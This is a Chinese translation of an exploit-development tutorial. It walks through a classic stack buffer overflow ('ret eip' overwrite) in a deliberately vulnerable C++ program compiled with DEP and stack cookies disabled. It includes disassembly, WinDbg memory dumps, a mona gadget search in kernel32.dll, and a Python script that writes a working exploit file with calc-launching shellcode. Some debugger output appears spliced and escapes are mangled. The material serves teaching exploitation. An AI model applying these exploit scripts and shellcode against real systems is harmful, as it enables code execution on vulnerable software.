
Exploit开发系列教程-Exploitme1 (“ret eip” overwrite) &More space on stack


  • http://expdev-kiuhnm.rhcloud.com/2015/05/26/exploitme1-ret-eip-overwrite/
  • http://expdev-kiuhnm.rhcloud.com/2015/06/13/more-space-on-the-stack/

0x01 Exploitme1 (“ret eip” overwrite) &More space on stack


#!c++ #include <cstdio> int main() {  char name[32];  printf("Enter your name and press ENTER/n");  scanf("%s", name);  printf("Hi, %s!/n", name);  return 0; }  




Hi, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! 



首先,在VS 2013中,通过Project→properties 关闭DEP和stack cookies保护机制,接着在Release选项下修改配置:

  • Configuration Properties->C/C++->Code Generation->Security Check: Disable Security Check (/GS-)
  • Linker->Advanced->Data Execution Prevention (DEP): No (/NXCOMPAT:NO)


int main() { 01391000 55       push  ebp   01391001 8B EC    mov   ebp,esp   01391003 83 EC 20    sub   esp,20h    char name[32];  printf("Enter your name and press ENTER/n"); 01391006 68 00 21 39 01    push  1392100h   0139100B FF 15 8C 20 39 01 call  dword ptr ds:[139208Ch]    scanf("%s", name); 01391011 8D 45 E0    lea   eax,[name]   01391014 50       push  eax   01391015 68 24 21 39 01    push  1392124h   0139101A FF 15 94 20 39 01 call  dword ptr ds:[1392094h]    printf("Hi, %s!/n", name); 01391020 8D 45 E0    lea   eax,[name]   01391023 50       push  eax   01391024 68 28 21 39 01    push  1392128h   01391029 FF 15 8C 20 39 01 call  dword ptr ds:[139208Ch]   0139102F 83 C4 14    add   esp,14h    return 0; 01391032 33 C0    xor   eax,eax   } 01391034 8B E5    mov   esp,ebp   01391036 5D       pop   ebp   01391037 C3       ret  


            mainret = main(argc, argv, envp); 00261222 FF 35 34 30 26 00    push        dword ptr ds:[263034h]   00261228 FF 35 30 30 26 00    push        dword ptr ds:[263030h]   0026122E FF 35 2C 30 26 00    push        dword ptr ds:[26302Ch]   00261234 E8 C7 FD FF FF       call        main (0261000h)   00261239 83 C4 0C             add         esp,0Ch 


 esp -->  argc         ; third push            argv         ; second push            envp         ; first push 


  esp -->  ret eip      ; 0x261239            argc         ; third push            argv         ; second push            envp         ; first push 


01391000 55                   push        ebp   01391001 8B EC                mov         ebp,esp   01391003 83 EC 20             sub         esp,20h   


  esp -->  name[0..3]   ; first 4 bytes of "name"  name[4..7]  .  .  .  name[28..31] ; last 4 bytes of "name"   ebp -->  saved ebp  ret eip      ; 0x261239  argc         ; third push  argv         ; second push  envp         ; first push  

现在scanf()从标准输入中读取数据并将其写入到数组name中。如果数据长度超过32字节,ret eip将会被覆写。


  01391034 8B E5                mov         esp,ebp     01391036 5D                   pop         ebp     01391037 C3                   ret 

在mov esp,ebp指令执行之后,栈将会是这样的:

esp,ebp -> saved ebp            ret eip      ; 0x261239            argc         ; third push            argv         ; second push            envp         ; first push 

在pop ebp 指令执行之后,我们有:

  esp -->  ret eip      ; 0x261239            argc         ; third push            argv         ; second push            envp         ; first push 

最后,从栈顶弹出ret eip 并转移到那个地址。如果我们改变ret eip,我们可以将执行流重定向到我们想要的任意地址。正如上文提到过的,我们可以通过写入超出数组name边界的变量来覆盖ret eip。因为scanf()不检查输入的长度,所以这一想法似乎可以实现。通过了解如上设计,你应该确信自己的ret eip定位在地址name+36上。

在VS 2013中,通过按下F5来开启调试器,并输入数据:



Unhandled exception at 0x61616161 in exploitme1.exe: 0xC0000005: Access violation reading location 0x61616161. 

‘a‘的ASCII代码是0x61,因此我们用”aaaa” ,即0x61616161覆盖ret eip,并且ret 指令已经跳转到非法地址0x61616161上。现在我们通过输入36个”a”,4个”b”和一定量的”c”来证实ret eip在name+36地址上。



Unhandled exception at 0x62626262 in exploitme1.exe: 0xC0000005: Access violation reading location 0x62626262. 



 name[0..3]      aaaa  name[4..7]      aaaa  .       .     B    .          A    .     E    .          F    .     F    name[28..31]  =========>   T    aaaa     O    saved ebp  E    aaaa     R    ret eip    R    bbbb     E    argc    cccc  argv    cccc  envp    cccc  


#!c++ #include <cstdio> int main() {  char name[32];  printf("Reading name from file.../n");  FILE *f = fopen("c://name.dat", "rb");  if (!f)   return -1;  fseek(f, 0L, SEEK_END);  long bytes = ftell(f);  fseek(f, 0L, SEEK_SET);  fread(name, 1, bytes, f);  name[bytes] = '/0';  fclose(f);  printf("Hi, %s!/n", name);  return 0; }  




(180c.5b0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=6d383071 edx=00835451 esi=00000001 edi=00000000 eip=62626262 esp=0041f7d0 ebp=61616161 iopl=0         nv up ei pl zr na pe nc cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246 62626262 ??              ??? 


0:000> d @esp 0041f7d0  63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63  cccccccccccccccc 0041f7e0  63 63 63 63 63 63 63 63-63 63 63 00 00 00 00 00  ccccccccccc..... 0041f7f0  dc f7 41 00 28 00 00 00-44 f8 41 00 09 17 35 01  ..A.(...D.A...5. 0041f800  b9 17 e0 fa 00 00 00 00-14 f8 41 00 8a 33 0c 76  ..........A..3.v 0041f810  00 e0 fd 7e 54 f8 41 00-72 9f 9f 77 00 e0 fd 7e  ...~T.A.r..w...~ 0041f820  2c 2d 41 75 00 00 00 00-00 00 00 00 00 e0 fd 7e  ,-Au...........~ 0041f830  00 00 00 00 00 00 00 00-00 00 00 00 20 f8 41 00  ............ .A. 0041f840  00 00 00 00 ff ff ff ff-f5 71 a3 77 28 10 9e 02  .........q.w(... 0:000> d @esp-0x20 0041f7b0  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa 0041f7c0  61 61 61 61 61 61 61 61-61 61 61 61 62 62 62 62  aaaaaaaaaaaabbbb 0041f7d0  63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63  cccccccccccccccc 0041f7e0  63 63 63 63 63 63 63 63-63 63 63 00 00 00 00 00  ccccccccccc..... 0041f7f0  dc f7 41 00 28 00 00 00-44 f8 41 00 09 17 35 01  ..A.(...D.A...5. 0041f800  b9 17 e0 fa 00 00 00 00-14 f8 41 00 8a 33 0c 76  ..........A..3.v 0041f810  00 e0 fd 7e 54 f8 41 00-72 9f 9f 77 00 e0 fd 7e  ...~T.A.r..w...~ 0041f820  2c 2d 41 75 00 00 00 00-00 00 00 00 00 e0 fd 7e  ,-Au...........~ 

完美!ESP指向”c”所在的地址。记住ESP是0x41f7d0.现在通过按下CTRL+SHIFT+F5 (restart)和F5(go)再次运行exploitme1.exe。


0:000> d @esp 0042fce0  63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63  cccccccccccccccc 0042fcf0  63 63 63 63 63 63 63 63-63 63 63 00 00 00 00 00  ccccccccccc..... 0042fd00  ec fc 42 00 29 00 00 00-54 fd 42 00 09 17 12 00  ..B.)...T.B..... 0042fd10  94 7f 07 21 00 00 00 00-24 fd 42 00 8a 33 0c 76  ...!....$.B..3.v 0042fd20  00 e0 fd 7e 64 fd 42 00-72 9f 9f 77 00 e0 fd 7e  ...~d.B.r..w...~ 0042fd30  c4 79 5c 75 00 00 00 00-00 00 00 00 00 e0 fd 7e  .y/u...........~ 0042fd40  00 00 00 00 00 00 00 00-00 00 00 00 30 fd 42 00  ............0.B. 0042fd50  00 00 00 00 ff ff ff ff-f5 71 a3 77 f0 41 80 02  .........q.w.A.. 

正如你可以了解到的,ESP仍然指向“c”所在的地址,但是地址不同。我们把shellcode放入”c”的位置。但是不能用0x42fce0去覆盖ret eip。因为准确的地址一直在变。但是ESP总是指向shellcode,因此为何我们不能用内存中含有一条JMP ESP指令的地址去覆盖ret eip呢?


0:000> .load pykd.pyd 0:000> !py mona Hold on... [+] Command used: !py mona.py      'mona' - Exploit Development Swiss Army Knife - WinDbg (32bit)      Plugin version : 2.0 r554      PyKD version      Written by Corelan - https://www.corelan.be      Project page : https://github.com/corelan/mona     |------------------------------------------------------------------|     |                                                                  |     |    _____ ___  ____  ____  ____ _                                 |     |    / __ `__ // __ // __ // __ `/  https://www.corelan.be         |     |   / / / / / / /_/ / / / / /_/ /  https://www.corelan-training.com|     |  /_/ /_/ /_//____/_/ /_//__,_/  #corelan (Freenode IRC)          |     |                                                                  |     |------------------------------------------------------------------|      Global options : ---------------- You can use one or more of the following global options on any command that will perform a search in one or more modules, returning a list of pointers :  -n                     : Skip modules that start with a null byte. If this is too broad, use                           option -cm nonull instead  -o                     : Ignore OS modules  -p <nr>                : Stop search after <nr> pointers.  -m <module,module,...> : only query the given modules. Be sure what you are doing !                           You can specify multiple modules (comma separated)                           Tip : you can use -m *  to include all modules. All other module criteria will be ignored                           Other wildcards : *blah.dll = ends with blah.dll, blah* = starts with blah,                           blah or *blah* = contains blah  -cm <crit,crit,...>    : Apply some additional criteria to the modules to query.                           You can use one or more of the following criteria :                           aslr,safeseh,rebase,nx,os                           You can enable or disable a certain criterium by setting it to true or false                           Example :  -cm aslr=true,safeseh=false                           Suppose you want to search for p/p/r in aslr enabled modules, you could call                           !mona seh -cm aslr  -cp <crit,crit,...>    : Apply some criteria to the pointers to return                           Available options are :                           unicode,ascii,asciiprint,upper,lower,uppernum,lowernum,numeric,alphanum,nonull,startswithnull,unicoderev                           Note : Multiple criteria will be evaluated using 'AND', except if you are looking for unicode + one crit  -cpb '/x00/x01'        : Provide list with bad chars, applies to pointers                           You can use .. to indicate a range of bytes (in between 2 bad chars)  -x <access>            : Specify desired access level of the returning pointers. If not specified,                           only executable pointers will be return.                           Access levels can be one of the following values : R,W,X,RW,RX,WX,RWX or *      Usage : -------       !mona <command> <parameter>      Available commands and parameters :      ? / eval             | Evaluate an expression allocmem / alloc     | Allocate some memory in the process assemble / asm       | Convert instructions to opcode. Separate multiple instructions with # bpseh / sehbp        | Set a breakpoint on all current SEH Handler function pointers breakfunc / bf       | Set a breakpoint on an exported function in on or more dll's breakpoint / bp      | Set a memory breakpoint on read/write or execute of a given address bytearray / ba       | Creates a byte array, can be used to find bad characters changeacl / ca       | Change the ACL of a given page compare / cmp        | Compare contents of a binary file with a copy in memory config / conf        | Manage configuration file (mona.ini) copy / cp            | Copy bytes from one location to another dump                 | Dump the specified range of memory to a file dumplog / dl         | Dump objects present in alloc/free log file dumpobj / do         | Dump the contents of an object egghunter / egg      | Create egghunter code encode / enc         | Encode a series of bytes filecompare / fc     | Compares 2 or more files created by mona using the same output commands fillchunk / fchunk   | Fill a heap chunk referenced by a register find / f             | Find bytes in memory findmsp / findmsf    | Find cyclic pattern in memory findwild / fw        | Find instructions in memory, accepts wildcards flow / flw           | Simulate execution flows, including all branch combinations fwptr / fwp          | Find Writeable Pointers that get called geteat / eat         | Show EAT of selected module(s) getiat / iat         | Show IAT of selected module(s) getpc                | Show getpc routines for specific registers gflags / gf          | Show current GFlags settings from PEB.NtGlobalFlag header               | Read a binary file and convert content to a nice 'header' string heap                 | Show heap related information help                 | show help hidedebug / hd       | Attempt to hide the debugger info                 | Show information about a given address in the context of the loaded application infodump / if        | Dumps specific parts of memory to file jmp / j              | Find pointers that will allow you to jump to a register jop                  | Finds gadgets that can be used in a JOP exploit kb / kb              | Manage Knowledgebase data modules / mod        | Show all loaded modules and their properties noaslr               | Show modules that are not aslr or rebased nosafeseh            | Show modules that are not safeseh protected nosafesehaslr        | Show modules that are not safeseh protected, not aslr and not rebased offset               | Calculate the number of bytes between two 0:000> d @esp 0041f7d0  63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63  cccccccccccccccc 0041f7e0  63 63 63 63 63 63 63 63-63 63 63 00 00 00 00 00  ccccccccccc..... 0041f7f0  dc f7 41 00 28 00 00 00-44 f8 41 00 09 17 35 01  ..A.(...D.A...5. 0041f800  b9 17 e0 fa 00 00 00 00-14 f8 41 00 8a 33 0c 76  ..........A..3.v 0041f810  00 e0 fd 7e 54 f8 41 00-72 9f 9f 77 00 e0 fd 7e  ...~T.A.r..w...~ 0041f820  2c 2d 41 75 00 00 00 00-00 00 00 00 00 e0 fd 7e  ,-Au...........~ 0041f830  00 00 00 00 00 00 00 00-00 00 00 00 20 f8 41 00  ............ .A. 0041f840  00 00 00 00 ff ff ff ff-f5 71 a3 77 28 10 9e 02  .........q.w(... 0:000> d @esp-0x20 0041f7b0  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa 0041f7c0  61 61 61 61 61 61 61 61-61 61 61 61 62 62 62 62  aaaaaaaaaaaabbbb 0041f7d0  63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63  cccccccccccccccc 0041f7e0  63 63 63 63 63 63 63 63-63 63 63 00 00 00 00 00  ccccccccccc..... 0041f7f0  dc f7 41 00 28 00 00 00-44 f8 41 00 09 17 35 01  ..A.(...D.A...5. 0041f800  b9 17 e0 fa 00 00 00 00-14 f8 41 00 8a 33 0c 76  ..........A..3.v 0041f810  00 e0 fd 7e 54 f8 41 00-72 9f 9f 77 00 e0 fd 7e  ...~T.A.r..w...~ 0041f820  2c 2d 41 75 00 00 00 00-00 00 00 00 00 e0 fd 7e  ,-Au...........~ addresses pageacl / pacl       | Show ACL associated with mapped pages pattern_create / pc  | Create a cyclic pattern of a given size pattern_offset / po  | Find location of 4 bytes in a cyclic pattern peb / peb            | Show location of the PEB rop                  | Finds gadgets that can be used in a ROP exploit and do ROP magic with them ropfunc              | Find pointers to pointers (IAT) to interesting functions that can be used in your ROP chain seh                  | Find pointers to assist with SEH overwrite exploits sehchain / exchain   | Show the current SEH chain skeleton             | Create a Metasploit module skeleton with a cyclic pattern for a given type of exploit stackpivot           | Finds stackpivots (move stackpointer to controlled area) stacks               | Show all stacks for all threads in the running application string / str         | Read or write a string from/to memory suggest              | Suggest an exploit buffer structure teb / teb            | Show TEB related information tobp / 2bp           | Generate WinDbg syntax to create a logging breakpoint at given location unicodealign / ua    | Generate venetian alignment code for unicode stack buffer overflow update / up          | Update mona to the latest version      Want more info about a given command ?  Run !mona help 


jmp / j              | Find pointers that will allow you to jump to a register 


0:000> !py mona jmp Hold on... [+] Command used: !py mona.py jmp Usage : Default module criteria : non aslr, non rebase Mandatory argument :  -r   where reg is a valid register      [+] This mona.py action took 0:00:00 


0:000> !py mona jmp -r ESP Hold on... [+] Command used: !py mona.py jmp -r ESP  ---------- Mona command started on 2015-03-18 02:30:53 (v2.0, rev 554) ---------- [+] Processing arguments and criteria  - Pointer access level : X [+] Generating module info table, hang on...  - Processing modules  - Done. Let's rock 'n roll. [+] Querying 0 modules  - Search complete, processing results [+] Preparing output file 'jmp.txt'  - (Re)setting logfile jmp.txt  Found a total of 0 pointers  [+] This mona.py action took 0:00:00.110000  

不幸的是,它并没有找到任何模块。问题出在所有模块都支持ASLR (AddressSpace Layout Randomization),即,它们在每次被加载进内存中时都会改变它们的基地址。现在,假设没有开启ASLR保护机制并在kernel32.dll模块中搜索JMP ESP指令。因为每个应用共用该模块,所以只在windows被重启后才会改变它所在的地址。这让它更有效地对抗利用,但是重启Windows之前,我们可以假装已经关闭了ASLR保护机制。


0:000> !py mona jmp -r ESP -m kernel32.dll Hold on... [+] Command used: !py mona.py jmp -r ESP -m kernel32.dll  ---------- Mona command started on 2015-03-18 02:36:58 (v2.0, rev 554) ---------- [+] Processing arguments and criteria  - Pointer access level : X  - Only querying modules kernel32.dll [+] Generating module info table, hang on...  - Processing modules  - Done. Let's rock 'n roll. [+] Querying 1 modules  - Querying module kernel32.dll            ^ Memory access error in '!py mona jmp -r ESP -m kernel32.dll'  ** Unable to process searchPattern 'mov eax,esp # jmp eax'. **  - Search complete, processing results [+] Preparing output file 'jmp.txt'  - (Re)setting logfile jmp.txt [+] Writing results to jmp.txt  - Number of pointers of type 'call esp' : 2  - Number of pointers of type 'push esp # ret ' : 1 [+] Results : 0x760e7133 |   0x760e7133 (b+0x00037133)  : call esp | ascii {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:/Windows/syswow64/kernel32.dll) 0x7614ceb2 |   0x7614ceb2 (b+0x0009ceb2)  : call esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:/Windows/syswow64/kernel32.dll) 0x7610a980 |   0x7610a980 (b+0x0005a980)  : push esp # ret  |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:/Windows/syswow64/kernel32.dll)  Found a total of 3 pointers  [+] This mona.py action took 0:00:00.172000  好的!找到了三个地址,我们使用最后一个:  0x7610a980 |   0x7610a980 (b+0x0005a980)  : push esp # ret  |  {PAGE_EXECUTE_READ}  


0:000> u 0x7610a980 kernel32!GetProfileStringW+0x1d3e4: 7610a980 54              push    esp 7610a981 c3              ret 7610a982 1076db          adc     byte ptr [esi-25h],dh 7610a985 fa              cli 7610a986 157640c310      adc     eax,10C34076h 7610a98b 76c8            jbe     kernel32!GetProfileStringW+0x1d3b9 (7610a955) 7610a98d fa              cli 7610a98e 157630c310      adc     eax,10C33076h 

正如你看到的,mona将不仅搜索JMP指令,还搜索CALL和PUSH+RET指令。因此,我们需要用0x7610a980即用字节“/x80/xa9/x10/x76” (记住Intel CPUs是小端模式).来覆盖ret eip。


#!python with open('c://name.dat', 'wb') as f:     ret_eip = '/x80/xa9/x10/x76'     shellcode = '/xcc'     name = 'a'*36 + ret_eip + shellcode     f.write(name) 

用WinDbg重新运行exploitme1.exe,按F5并且WinDbg将断在我们的shellcode上(0xCC是int 3的操作码,调试器使用它来作为一个软件断点):

(1adc.1750): Break instruction exception - code 80000003 (first chance) *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Windows/syswow64/kernel32.dll - eax=00000000 ebx=00000000 ecx=6d383071 edx=002e5437 esi=00000001 edi=00000000 eip=001cfbf8 esp=001cfbf8 ebp=61616161 iopl=0         nv up ei pl zr na pe nc cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246 001cfbf8 cc              int     3 


#!python with open('c://name.dat', 'wb') as f:  ret_eip = '/x80/xa9/x10/x76'  shellcode = ("/xe8/xff/xff/xff/xff/xc0/x5f/xb9/x11/x03/x02/x02/x81/xf1/x02/x02"+   "/x02/x02/x83/xc7/x1d/x33/xf6/xfc/x8a/x07/x3c/x02/x0f/x44/xc6/xaa"+   "/xe2/xf6/x55/x8b/xec/x83/xec/x0c/x56/x57/xb9/x7f/xc0/xb4/x7b/xe8"+   "/x55/x02/x02/x02/xb9/xe0/x53/x31/x4b/x8b/xf8/xe8/x49/x02/x02/x02"+   "/x8b/xf0/xc7/x45/xf4/x63/x61/x6c/x63/x6a/x05/x8d/x45/xf4/xc7/x45"+   "/xf8/x2e/x65/x78/x65/x50/xc6/x45/xfc/x02/xff/xd7/x6a/x02/xff/xd6"+   "/x5f/x33/xc0/x5e/x8b/xe5/x5d/xc3/x33/xd2/xeb/x10/xc1/xca/x0d/x3c"+   "/x61/x0f/xbe/xc0/x7c/x03/x83/xe8/x20/x03/xd0/x41/x8a/x01/x84/xc0"+   "/x75/xea/x8b/xc2/xc3/x8d/x41/xf8/xc3/x55/x8b/xec/x83/xec/x14/x53"+   "/x56/x57/x89/x4d/xf4/x64/xa1/x30/x02/x02/x02/x89/x45/xfc/x8b/x45"+   "/xfc/x8b/x40/x0c/x8b/x40/x14/x8b/xf8/x89/x45/xec/x8b/xcf/xe8/xd2"+   "/xff/xff/xff/x8b/x3f/x8b/x70/x18/x85/xf6/x74/x4f/x8b/x46/x3c/x8b"+   "/x5c/x30/x78/x85/xdb/x74/x44/x8b/x4c/x33/x0c/x03/xce/xe8/x96/xff"+   "/xff/xff/x8b/x4c/x33/x20/x89/x45/xf8/x03/xce/x33/xc0/x89/x4d/xf0"+   "/x89/x45/xfc/x39/x44/x33/x18/x76/x22/x8b/x0c/x81/x03/xce/xe8/x75"+   "/xff/xff/xff/x03/x45/xf8/x39/x45/xf4/x74/x1e/x8b/x45/xfc/x8b/x4d"+   "/xf0/x40/x89/x45/xfc/x3b/x44/x33/x18/x72/xde/x3b/x7d/xec/x75/x9c"+   "/x33/xc0/x5f/x5e/x5b/x8b/xe5/x5d/xc3/x8b/x4d/xfc/x8b/x44/x33/x24"+   "/x8d/x04/x48/x0f/xb7/x0c/x30/x8b/x44/x33/x1c/x8d/x04/x88/x8b/x04"+   "/x30/x03/xc6/xeb/xdd")  name = 'a'*36 + ret_eip + shellcode  f.write(name)  


#!c++ #define HASH_ExitThread    0x4b3153e0 #define HASH_WinExec    0x7bb4c07f int entryPoint() {  DefineFuncPtr(WinExec);  DefineFuncPtr(ExitThread);  char calc[] = { 'c', 'a', 'l', 'c', '.', 'e', 'x', 'e', '/0' };  // makes our shellcode shorter  My_WinExec(calc, SW_SHOW);  My_ExitThread(0);  return 0; }  



0x02 More space on stack(栈上分配更多的空间)



#!c++ #include <cstdio>   int main() {     <contents of main> } 


#!c++ #include <cstdio> _declspec(noinline) int old_main() {  <contents of main> } int main() {  char moreStack[10000];  for (int i = 0; i < sizeof(moreStack); ++i)   moreStack[i] = i;  return old_main(); }  


#!c++ #include <cstdio> int main() {  char name[32];  printf("Reading name from file.../n");  FILE *f = fopen("c://name.dat", "rb");  if (!f)   return -1;  fseek(f, 0L, SEEK_END);  long bytes = ftell(f);  fseek(f, 0L, SEEK_SET);  fread(name, 1, bytes, f);  name[bytes] = '/0';  fclose(f);  printf("Hi, %s!/n", name);  return 0; }  


#!c++ #include <cstdio> _declspec(noinline) int old_main() {  char name[32];  printf("Reading name from file.../n");  FILE *f = fopen("c://name.dat", "rb");  if (!f)   return -1;  fseek(f, 0L, SEEK_END);  long bytes = ftell(f);  fseek(f, 0L, SEEK_SET);  fread(name, 1, bytes, f);  name[bytes] = '/0';  fclose(f);  printf("Hi, %s!/n", name);  return 0; } int main() {  char moreStack[10000];  for (int i = 0; i < sizeof(moreStack); ++i)   moreStack[i] = i;  return old_main(); }  



在main中需要for循环,否则moreStack将会被优化掉。同时,如果函数f是内联的,那么在defeat目标的moreStack(即朝着栈末端)后,缓冲区name会被分配。因此,为了避免出现该情况,我们需要使用 _declspec(noinline)。


Exploit开发系列教程-Exploitme1 (“ret eip” overwrite) &amp;More space on stack
